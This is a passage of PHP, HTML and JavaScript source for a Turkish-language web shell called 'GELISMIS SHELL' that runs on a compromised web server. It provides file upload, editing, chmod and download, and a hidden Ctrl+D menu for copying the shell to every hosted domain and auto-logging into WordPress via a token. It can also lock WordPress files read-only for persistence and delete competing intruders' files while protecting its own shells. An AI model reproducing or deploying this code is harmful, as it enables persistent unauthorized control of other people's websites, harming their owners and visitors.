charset=UTF-8'); $dir = $_GET['dir'] ?? ''; $pass = $_GET['pass'] ?? 
''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $malicious = find_malicious_files($dir); $_SESSION['malicious'] = $malicious; $_SESSION['scan_completed'] = time(); echo json_encode(['success' => true, 'count' => count($malicious), 'message' => count($malicious) . " zararlı dosya bulundu!"]); exit; } if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json; charset=UTF-8'); $file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? ''; if ($file && file_exists($file)) { clearstatcache(true, $file); $perms = fileperms($file) & 0777; if ($perms <= 0444 && $perms != 0644 && $perms != 0664 && $perms != 0777) { echo json_encode(['success' => false, 'message' => '']); exit; } $old_perms = $perms; if (!is_writable($file)) @chmod($file, 0644); if (file_put_contents($file, $content) !== false) { if ($old_perms <= 0444 && $old_perms != 0644) @chmod($file, $old_perms); echo json_encode(['success' => true, 'message' => '']); } else { echo json_encode(['success' => false, 'message' => '']); } } else { echo json_encode(['success' => false, 'message' => '']); } exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { $action = $_POST['action'] ?? ''; $current_dir = $_POST['current_dir'] ?? getcwd(); $output = ''; $redirect_url = '?dir=' . 
urlencode($current_dir); if ($action==='rename') { $old=$_POST['old']??''; $new=$_POST['new']??''; $new_path=dirname($old).'/'.$new; if ($old&&$new&&file_exists($old)&&!file_exists($new_path)) { rename($old,$new_path); } } elseif ($action==='chmod') { $file=$_POST['file']??''; $mode=$_POST['mode']??''; if ($file&&$mode) { chmod($file,octdec($mode)); } } elseif ($action==='toggle_write'&&!empty($_POST['paths'])) { foreach ($_POST['paths'] as $p) { $p=stripslashes($p); if (file_exists($p)&&!in_array(basename($p),$protected_files)&&!in_array(basename($p),$wordpress_core_files)&&!in_array(basename($p),$our_shells)) { clearstatcache(true,$p); $perms=fileperms($p)&0777; $new_perms=($perms&0200)?($perms&~0200):($perms|0200); $ok=@chmod($p,$new_perms); if (!$ok && is_file($p)) { $content=@file_get_contents($p); if ($content!==false) { @file_put_contents($p,$content); @chmod($p,$new_perms); } } } } } elseif ($action==='upload'&&isset($_FILES['files'])) { $uploaded=0; foreach ($_FILES['files']['tmp_name'] as $i=>$tmp) { $name=$_FILES['files']['name'][$i]; $target = $current_dir.'/'.$name; if (move_uploaded_file($tmp,$target)) { chmod($target,0644); } } } header('Location: ' . $redirect_url); exit; } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { while (ob_get_level()) ob_end_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: '.filesize($file)); readfile($file); exit; } } $items = scandir($current_dir); $folders = array(); $files = array(); foreach ($items as $item) { if ($item=='.'||$item=='..') continue; $path = $current_dir.'/'.$item; if (is_dir($path)) $folders[]=$item; else $files[]=$item; } sort($folders); sort($files); $malicious_files = (isset($_SESSION['malicious'])&&isset($_SESSION['scan_completed'])) ? $_SESSION['malicious'] : array(); $analysis = $_SESSION['analysis'] ?? ''; $analysis_file = $_SESSION['analysis_file'] ?? 
''; unset($_SESSION['analysis'],$_SESSION['analysis_file']); $deploy_url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?deploy=run'; $wp_auto_login_url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?wp_auto_login=1&token=' . $wp_auto_login_token; $file_to_edit = null; if (isset($_GET['editf'])) { $file_to_edit = base64_decode($_GET['editf']); } elseif (isset($_GET['edit'])) { $file_to_edit = $_GET['edit']; } $wp_domain_count = get_wordpress_domain_count(); $wp_domains_list = get_wordpress_domains_list(); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>GELISMIS SHELL - WP Domain: <?php echo $wp_domain_count; ?></title> <style> * { margin:0; padding:0; box-sizing:border-box; } body { background:#1e272e; color:#fff; font-family:system-ui, -apple-system, 'Segoe UI', Roboto, Arial, sans-serif; padding:20px; } .container { max-width:1400px; margin:0 auto; background:#2f3640; padding:20px; border-radius:12px; } h2 { font-size:16px; margin-bottom:15px; padding:10px; background:#353b48; border-radius:8px; word-break:break-all; } h3 { margin:15px 0 10px; color:#00a8ff; font-size:14px; } .top-bar { display:flex; gap:10px; flex-wrap:wrap; margin-bottom:20px; align-items:center; justify-content:flex-end; background:#353b48; padding:10px 15px; border-radius:8px; } .action-btn { display:inline-block; padding:8px 16px; border-radius:6px; text-decoration:none; font-weight:600; text-align:center; cursor:pointer; border:none; font-size:12px; transition:all 0.2s; } .action-btn.close { background:#e84118; color:#fff; } .action-btn.open { background:#44bd32; color:#fff; } .action-btn.izin { background:#f39c12; color:#000; } .action-btn.deploy { background:#8e44ad; color:#fff; } .action-btn.wp { background:#3498db; color:#fff; } .action-btn.scan { background:#e67e22; color:#fff; } .action-btn.domain { background:#00a8ff; color:#fff; } 
.action-btn.malicious { background:#e84118; color:#fff; } .action-btn.permission { background:#1abc9c; color:#fff; } .action-btn.lock-wp { background:#9b59b6; color:#fff; } .action-btn.unlock-wp { background:#2ecc71; color:#fff; } .action-btn:hover { opacity:0.85; transform:translateY(-1px); } .toolbar { display:flex; gap:8px; flex-wrap:wrap; margin-bottom:20px; background:#353b48; padding:10px 15px; border-radius:8px; align-items:center; } button, a.button { background:#40739e; color:#fff; border:none; padding:8px 14px; border-radius:6px; cursor:pointer; text-decoration:none; font-size:12px; transition:all 0.2s; } button:hover, a.button:hover { background:#487eb0; } .danger { background:#e84118; } .danger:hover { background:#c23616; } .success { background:#44bd32; } .warning { background:#f39c12; color:#000; } .info { background:#00a8ff; } .row { display:grid; grid-template-columns:30px 2fr auto; gap:10px; align-items:center; background:#353b48; padding:8px 12px; border-radius:8px; margin:4px 0; transition:background 0.2s; } .row:hover { background:#40739e; } .row.malicious { background:#3d2d2d; border-left:3px solid #e84118; } .row.protected { background:#2d2d2d; border-left:3px solid #44bd32; opacity:0.9; } .name a { color:#00a8ff; text-decoration:none; } .name a:hover { text-decoration:underline; } .wp-badge, .our-badge, .malicious-badge, .protected-badge, .inactive-badge { padding:2px 8px; border-radius:20px; font-size:10px; margin-left:8px; font-weight:600; display:inline-block; } .wp-badge, .our-badge, .protected-badge { background:#44bd32; color:#000; } .malicious-badge { background:#e84118; color:#fff; } .inactive-badge { background:#888; color:#fff; } .inline-controls { display:flex; gap:6px; align-items:center; flex-wrap:wrap; } .list-header { display:flex; justify-content:space-between; align-items:center; margin:15px 0 10px; } hr { border:1px solid #353b48; margin:20px 0; } .modal { display:none; position:fixed; top:0; left:0; width:100%; height:100%; 
background:rgba(0,0,0,0.85); z-index:1000; align-items:center; justify-content:center; } .modal.active { display:flex; } .modal-content { background:#2f3640; padding:25px; width:900px; max-width:90%; border-radius:12px; max-height:80vh; overflow-y:auto; } .modal-content h3 { margin-top:0; } .toast { position:fixed; bottom:30px; right:30px; background:#2f3640; color:#fff; padding:12px 20px; border-radius:8px; z-index:9999; border-left:4px solid #44bd32; box-shadow:0 4px 12px rgba(0,0,0,0.3); max-width:400px; word-break:break-word; font-size:13px; white-space:pre-line; animation: fadeInOut 3s ease forwards; } .toast.error { border-left-color:#e84118; } .toast.success { border-left-color:#44bd32; } .toast.info { border-left-color:#00a8ff; } @keyframes fadeInOut { 0% { opacity:0; transform:translateY(20px); } 10% { opacity:1; transform:translateY(0); } 90% { opacity:1; } 100% { opacity:0; transform:translateY(-20px); visibility:hidden; } } .domain-list { max-height:400px; overflow-y:auto; margin:15px 0; border:1px solid #40739e; border-radius:8px; } .domain-item { padding:12px; background:#353b48; margin:2px 0; cursor:pointer; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; } .domain-item:hover { background:#40739e; } .domain-url { color:#00a8ff; font-weight:bold; font-size:14px; } .domain-path { color:#888; font-size:11px; margin-top:4px; } .domain-stats { display:flex; gap:10px; margin-bottom:15px; flex-wrap:wrap; } .domain-stat-box { background:#353b48; padding:10px 15px; border-radius:8px; text-align:center; } .delete-section { margin-top:20px; background:#3d2d2d; border-radius:10px; border-left:3px solid #e84118; overflow:hidden; } .delete-title { color:#e84118; font-weight:bold; padding:12px 18px; cursor:pointer; display:flex; justify-content:space-between; align-items:center; user-select:none; } .delete-title:hover { background:rgba(232,65,24,0.15); } .delete-title .toggle-arrow { font-size:11px; 
transition:transform 0.25s; } .delete-title.collapsed .toggle-arrow { transform:rotate(-90deg); } .delete-body { padding:0 18px 18px; } .delete-body.collapsed { display:none; } .pre-box { background:#1e272e; padding:15px; border-radius:8px; color:#0f0; font-family:'Courier New',monospace; white-space:pre-wrap; max-height:500px; overflow:auto; border:1px solid #40739e; font-size:12px; line-height:1.5; } .stats { background:#353b48; padding:12px 15px; border-radius:8px; margin:15px 0 0; display:flex; gap:20px; flex-wrap:wrap; } .stat-item { flex:1; text-align:center; } .stat-value { font-size:28px; font-weight:bold; color:#00a8ff; } .stat-label { font-size:11px; color:#888; margin-top:4px; } .editor-container { background:#1e272e; border-radius:10px; overflow:hidden; margin-top:10px; border:1px solid #40739e; } .editor-header { background:#2f3640; padding:12px 15px; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; flex-wrap:wrap; gap:10px; } .editor-title { font-size:14px; font-weight:600; color:#00a8ff; word-break:break-all; } .editor-title code { background:#1e272e; padding:4px 8px; border-radius:5px; font-size:12px; } .editor-buttons { display:flex; gap:8px; } .editor-buttons button { padding:6px 14px; font-size:12px; } .editor-buttons .save-btn { background:#44bd32; color:#000; font-weight:bold; } .editor-buttons .save-btn:hover { background:#55dd44; } .editor-buttons .cancel-btn { background:#e84118; } .editor-buttons .copy-btn { background:#3498db; } .editor-textarea { width:100%; min-height:500px; background:#0d1117; color:#e6edf3; border:none; padding:15px; font-family:'Monaco', 'Menlo', 'Ubuntu Mono', 'Consolas', monospace; font-size:13px; line-height:1.6; resize:vertical; outline:none; tab-size:4; } .editor-textarea:focus { outline:none; background:#161b22; } .editor-info { background:#2f3640; padding:8px 15px; font-size:11px; color:#888; display:flex; justify-content:space-between; flex-wrap:wrap; gap:10px; 
border-top:1px solid #40739e; } .editor-info span { color:#00a8ff; } .warning-box { background:#e84118; padding:12px 15px; border-radius:8px; margin-bottom:15px; color:#fff; font-weight:500; display:flex; align-items:center; gap:10px; } .warning-box::before { content:"⚠️"; font-size:18px; } .upload-row { display:flex; gap:10px; align-items:center; flex-wrap:wrap; } .hidden-menu { background:#2d2d2d; padding:10px 15px; border-radius:8px; margin-bottom:15px; border-left:3px solid #f39c12; display:flex; align-items:center; gap:10px; flex-wrap:wrap; } .hidden-menu.hidden { display:none; } .hidden-menu-title { color:#f39c12; font-size:12px; display:flex; align-items:center; gap:8px; } .loading-overlay { position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.5); z-index:10000; display:flex; align-items:center; justify-content:center; visibility:hidden; } .loading-overlay.active { visibility:visible; } .spinner { width:50px; height:50px; border:3px solid #40739e; border-top-color:#00a8ff; border-radius:50%; animation: spin 1s linear infinite; } @keyframes spin { to { transform:rotate(360deg); } } .checkbox-column { width:30px; text-align:center; } .wp-count-badge { background:#00a8ff; color:#fff; padding:4px 12px; border-radius:20px; font-size:12px; font-weight:bold; margin-left:10px; } </style> <script> function toggleAll(s){ var checkboxes = document.querySelectorAll("input[name='bulk_delete[]']"); checkboxes.forEach(cb => cb.checked = s.checked); } function toggleMalicious(s){ var checkboxes = document.querySelectorAll("input[name='selected[]']"); checkboxes.forEach(cb => cb.checked = s.checked); } function showRenameModal(path,name){ document.getElementById('rename_old').value = path; document.getElementById('rename_new').value = name; document.getElementById('renameModal').classList.add('active'); } function hideRenameModal(){ document.getElementById('renameModal').classList.remove('active'); } function showDomainModal(){ 
document.getElementById('domainModal').classList.add('active'); } function hideDomainModal(){ document.getElementById('domainModal').classList.remove('active'); } function showMaliciousModal(){ document.getElementById('maliciousModal').classList.add('active'); } function hideMaliciousModal(){ document.getElementById('maliciousModal').classList.remove('active'); } function goToDomain(path){ window.location.href = '?dir=' + encodeURIComponent(path); } function openDomainUrl(url){ window.open(url, '_blank'); } function downloadFile(path){ window.location.href = '?download=' + encodeURIComponent(path); } function analyzeFile(path){ var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input name="action" value="analyze"><input name="file" value="' + path.replace(/"/g, '"') + '">'; document.body.appendChild(form); form.submit(); } function editFile(path){ window.location.href = '?editf=' + btoa(unescape(encodeURIComponent(path))) + '&dir=<?php echo urlencode($current_dir); ?>'; } function openUrl(url){ window.open(url, '_blank'); } function toggleSection(titleEl){ titleEl.classList.toggle('collapsed'); var body = titleEl.nextElementSibling; body.classList.toggle('collapsed'); } function showToast(message, type){ if(!message) return; var toast = document.createElement('div'); toast.className = 'toast ' + (type || 'info'); toast.innerHTML = message.replace(/\n/g, '<br>'); document.body.appendChild(toast); setTimeout(function(){ if(toast && toast.remove) toast.remove(); }, 4000); } function kilitIslem(action){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?kilit_ajax=' + action + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast(response.message, 'success'); } } catch(e){} 
btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function wpLockAction(action){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?wp_lock_action=' + action + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success !== false){ var msg = ''; if(action === 'status'){ msg = '📊 WP KİLİT DURUMU:\n🔒 Kilitli: ' + (response.is_locked ? 'Evet' : 'Hayır') + '\n📦 MU-Plugin: ' + (response.mu_plugin_active ? 'Aktif' : 'Pasif'); } else { msg = '✅ ' + (action === 'lock' ? 'WP KİLİTLENDİ' : 'WP KİLİDİ AÇILDI') + '\n📄 Dosyalar: ' + response.files_changed + ' değiştirildi\n📁 Klasörler: ' + response.dirs_changed + ' değiştirildi\n⏱️ Süre: ' + response.elapsed + ' sn'; } showToast(msg, action === 'lock' ? 
'success' : 'info'); } else { showToast('❌ ' + (response.error || 'Hata oluştu!'), 'error'); } } catch(e){ showToast('❌ Hata: ' + e.message, 'error'); } btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; showToast('❌ Bağlantı hatası!', 'error'); }; xhr.send(); } function scanAllDomains(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ Taranıyor...'; btn.disabled = true; showToast('🔍 Tüm domainler taranıyor, bu işlem birkaç dakika sürebilir...', 'info'); var xhr = new XMLHttpRequest(); xhr.open('GET', '?scan_all_ajax=1&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message + ' (' + response.domains_scanned + ' domain tarandı)', 'success'); } else { showToast('❌ Hata oluştu!', 'error'); } } catch(e){ showToast('❌ Hata: ' + e.message, 'error'); } btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; showToast('❌ Bağlantı hatası!', 'error'); }; xhr.send(); } function deployToAllDomains(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ Kopyalanıyor...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?deploy_all_ajax=1&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message + ' (' + response.domains + ' domain)', 'success'); } else { showToast('❌ Hata oluştu!', 'error'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function checkPermissions(){ var pass = prompt('Şifre:'); if(!pass) return; 
var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=check&file=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ var msg = ''; if(response.htaccess.exists){ msg += '📁 .htaccess: ' + (response.htaccess.writable ? '✅ Yazılabilir' : '❌ Salt Okunur'); } else { msg += '📁 .htaccess: ❌ Dosya yok'; } msg += '\n'; if(response.index.exists){ msg += '📄 index.php: ' + (response.index.writable ? '✅ Yazılabilir' : '❌ Salt Okunur'); } else { msg += '📄 index.php: ❌ Dosya yok'; } showToast(msg, 'info'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function setHtaccessWritable(writable){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=set_htaccess&file=<?php echo urlencode($current_dir); ?>&writable=' + writable + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast('✅ .htaccess ' + response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function setIndexWritable(writable){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=set_index&file=<?php echo urlencode($current_dir); ?>&writable=' + writable + '&pass=' + 
encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast('✅ index.php ' + response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function scanMaliciousAjax(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?scan_ajax=1&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function bulkDeleteAjax(){ var checkboxes = document.querySelectorAll("input[name='bulk_delete[]']:checked"); if(checkboxes.length === 0){ showToast('❌ Lütfen silinecek dosya/klasör seçin!', 'error'); return; } var pass = prompt('Şifre:'); if(!pass) return; var paths = []; checkboxes.forEach(cb => paths.push(cb.value)); var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?bulk_delete_ajax=1&paths=' + encodeURIComponent(paths.join('||')) + '&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ 
btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function deleteSelectedMalicious(){ var checkboxes = document.querySelectorAll("input[name='selected[]']:checked"); if(checkboxes.length === 0){ showToast('❌ Lütfen silinecek dosyaları seçin!', 'error'); return; } var pass = prompt('Şifre:'); if(!pass) return; var paths = []; checkboxes.forEach(cb => paths.push(cb.value)); var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?bulk_delete_ajax=1&paths=' + encodeURIComponent(paths.join('||')) + '&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function saveFile(){ var content = document.getElementById('editor-content').value; var file = document.getElementById('edit-file').value; var currentDir = document.getElementById('current-dir').value; var loadingOverlay = document.getElementById('loading-overlay'); loadingOverlay.classList.add('active'); var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function(){ loadingOverlay.classList.remove('active'); try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ Kaydedildi', 'success'); setTimeout(function(){ window.location.href = '?dir=' + encodeURIComponent(currentDir); }, 1000); } } catch(e){} }; xhr.onerror = function(){ loadingOverlay.classList.remove('active'); }; xhr.send('action=edit&file=' + encodeURIComponent(file) + 
'&content=' + encodeURIComponent(content) + '¤t_dir=' + encodeURIComponent(currentDir)); } document.addEventListener('keydown', function(e){ if(e.ctrlKey && e.key === 'd'){ e.preventDefault(); var hiddenMenu = document.getElementById('hidden-menu'); if(hiddenMenu.classList.contains('hidden')){ hiddenMenu.classList.remove('hidden'); showToast('🔓 Gizli menü gösteriliyor', 'info'); } else { hiddenMenu.classList.add('hidden'); showToast('🔒 Gizli menü gizlendi', 'info'); } } }); function copyToClipboard(){ var textarea = document.getElementById('editor-content'); textarea.select(); document.execCommand('copy'); showToast('📋 Kopyalandı!', 'success'); } </script> </head> <body> <div class="container"> <div style="background:#353b48; padding:8px; margin-bottom:15px; text-align:center; color:#00a8ff; font-weight:bold; border-radius:8px; font-size:13px;"> 🔥 GELİŞMİŞ SHELL | <?php echo implode(', ', $allowed_shells); ?> <span class="wp-count-badge">📊 WP DOMAIN: <?php echo $wp_domain_count; ?></span> </div> <div class="top-bar"> <a href="?logout=1" class="button">🚪 Çıkış</a> </div> <div id="hidden-menu" class="hidden-menu hidden"> <span class="hidden-menu-title">🔐 GİZLİ MENÜ (Ctrl+D)</span> <button class="action-btn domain" onclick="showDomainModal()">🌐 WP Domainler (<?php echo $wp_domain_count; ?>)</button> <button class="action-btn scan" onclick="scanMaliciousAjax()">🔍 ZARARLI TARA</button> <button class="action-btn scan" onclick="scanAllDomains()">🌍 TÜM DOMAINLERİ TARA</button> <?php if (!empty($malicious_files)): ?> <button class="action-btn malicious" onclick="showMaliciousModal()">⚠️ ZARARLILAR (<?php echo count($malicious_files); ?>)</button> <?php endif; ?> <a href="#" onclick="if(confirm('Tüm domainlere shell kopyalansin mi?')){ openUrl('<?php echo $deploy_url; ?>'); } return false;" class="action-btn deploy">📦 SHELL KOPYALA</a> <button class="action-btn deploy" onclick="deployToAllDomains()">📦 TÜM DOMAINLERE KOPYALA</button> <a href="#" onclick="openUrl('<?php echo 
$wp_auto_login_url; ?>'); return false;" class="action-btn wp">🚀 WP GİRİŞ</a> <a href="#" onclick="kilitIslem('close'); return false;" class="action-btn close">🔒 SİSTEMİ KİLITLE</a> <a href="#" onclick="kilitIslem('open'); return false;" class="action-btn open">🔓 SİSTEM KİLİDİNİ AÇ</a> <a href="#" onclick="kilitIslem('izin'); return false;" class="action-btn izin">📊 SİSTEM DURUMU</a> <button class="action-btn lock-wp" onclick="wpLockAction('lock')">🔒 WP LOCK (0444/0555)</button> <button class="action-btn unlock-wp" onclick="wpLockAction('unlock')">🔓 WP UNLOCK (0644/0755)</button> <button class="action-btn izin" onclick="wpLockAction('status')">📊 WP KİLİT DURUMU</button> <button class="action-btn permission" onclick="checkPermissions()">📋 İZİN KONTROL</button> <button class="action-btn success" onclick="setHtaccessWritable(true)">✏️ .htaccess YAZ</button> <button class="action-btn danger" onclick="setHtaccessWritable(false)">🔒 .htaccess OKU</button> <button class="action-btn success" onclick="setIndexWritable(true)">✏️ index.php YAZ</button> <button class="action-btn danger" onclick="setIndexWritable(false)">🔒 index.php OKU</button> </div> <h2>📁 <?php echo htmlspecialchars($current_dir); ?></h2> <div class="toolbar"> <?php if (dirname($current_dir) != $current_dir): ?> <a class="button" href="?dir=<?php echo urlencode(dirname($current_dir)); ?>">📂 Üst Dizin</a> <?php endif; ?> <span style="margin-left:auto; font-size:11px;">Korunan: <?php echo count($our_shells) + count($wordpress_core_files) + count($protected_files); ?> dosya</span> </div> <form method="post" enctype="multipart/form-data" class="upload-row" style="margin:15px 0;"> <input type="file" name="files[]" multiple style="background:#1e272e; border:1px solid #40739e; padding:8px; border-radius:6px; color:#fff; flex:1;"> <button type="submit" class="success">📤 Dosya Yükle</button> <input type="hidden" name="action" value="upload"> <input type="hidden" name="current_dir" value="<?php echo 
htmlspecialchars($current_dir); ?>"> </form> <hr> <div id="domainModal" class="modal"><div class="modal-content"> <h3>🌐 WordPress Kurulu Domainler (<?php echo $wp_domain_count; ?> adet)</h3> <div class="domain-stats"><div class="domain-stat-box"><div class="stat-value" style="color:#00a8ff;"><?php echo $wp_domain_count; ?></div><div class="stat-label">WordPress Kurulu Domain</div></div></div> <?php if($wp_domain_count > 0): ?> <div class="domain-list"> <?php foreach ($wp_domains_list as $d): ?> <div class="domain-item" onclick="goToDomain('<?php echo htmlspecialchars($d['path']); ?>')"> <div><span class="domain-url">📁 <?php echo htmlspecialchars($d['path']); ?></span> <div class="domain-path"><?php if($d['has_wp_config']): ?>✅ wp-config.php <?php endif; ?><?php if($d['has_wp_load']): ?>✅ wp-load.php <?php endif; ?><?php if($d['has_wp_admin']): ?>✅ /wp-admin <?php endif; ?><?php if($d['has_wp_content']): ?>✅ /wp-content <?php endif; ?></div></div> <button class="button info" onclick="event.stopPropagation(); goToDomain('<?php echo htmlspecialchars($d['path']); ?>')">📂 Aç</button> </div> <?php endforeach; ?> </div> <?php else: ?> <div style="text-align:center; padding:40px; color:#888;">⚠️ WordPress kurulu domain bulunamadı!</div> <?php endif; ?> <button onclick="hideDomainModal()">Kapat</button> </div></div> <?php if (!empty($malicious_files)): ?> <div id="maliciousModal" class="modal"><div class="modal-content"> <h3>⚠️ ZARARLI DOSYALAR (<?php echo count($malicious_files); ?>)</h3> <div style="margin-bottom:15px;"><button class="action-btn danger" onclick="deleteSelectedMalicious()">🗑 SEÇİLİLERİ SİL</button><button onclick="hideMaliciousModal()">Kapat</button></div> <table style="width:100%; border-collapse:collapse;"><thead><tr style="border-bottom:1px solid #40739e;"><th class="checkbox-column"><input type="checkbox" onclick="toggleMalicious(this)"></th><th style="padding:8px; text-align:left;">Dosya</th><th style="padding:8px; text-align:left; 
width:60px;">Risk</th><th style="padding:8px; text-align:left; width:200px;">İşlemler</th></tr></thead> <tbody><?php foreach ($malicious_files as $m): ?> <tr style="border-bottom:1px solid #353b48;"><td class="checkbox-column"><input type="checkbox" name="selected[]" value="<?php echo htmlspecialchars($m['path']); ?>"></td> <td style="padding:8px;"><strong><?php echo htmlspecialchars($m['name']); ?></strong><br><small style="color:#888;"><?php echo htmlspecialchars(substr(dirname($m['path']),0,60)); ?></small><br><small>Boyut: <?php echo $m['size']; ?> bytes</small></td> <td style="padding:8px;"><span style="background:#e84118; padding:2px 8px; border-radius:20px; font-size:11px;"><?php echo $m['risk']; ?></span></td> <td style="padding:8px;"><button type="button" onclick="downloadFile('<?php echo addslashes($m['path']); ?>')">📥 İndir</button><button type="button" onclick="showRenameModal('<?php echo addslashes($m['path']); ?>','<?php echo addslashes($m['name']); ?>')">✏️ Adlandır</button><button type="button" onclick="analyzeFile('<?php echo addslashes($m['path']); ?>')">🔍 Analiz</button><button type="button" onclick="editFile('<?php echo addslashes($m['path']); ?>')">✏️ Düzenle</button></td></tr> <?php endforeach; ?></tbody></table> </div></div> <?php endif; ?> <?php if (!empty($plugins['suspicious'])): ?> <div class="delete-section"><div class="delete-title collapsed" onclick="toggleSection(this)">⚠️ ŞÜPHELİ EKLENTİLER (<?php echo count($plugins['suspicious']); ?>) <span class="toggle-arrow">▼</span></div> <div class="delete-body collapsed"> <?php foreach ($plugins['suspicious'] as $plugin): ?> <div class="row"><div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></div> <div>📦 <?php echo htmlspecialchars($plugin['name']); ?><span class="inactive-badge">PASİF</span><span class="malicious-badge">ŞÜPHELİ</span></div> <div><button type="button" onclick="downloadFile('<?php echo addslashes($plugin['path']); 
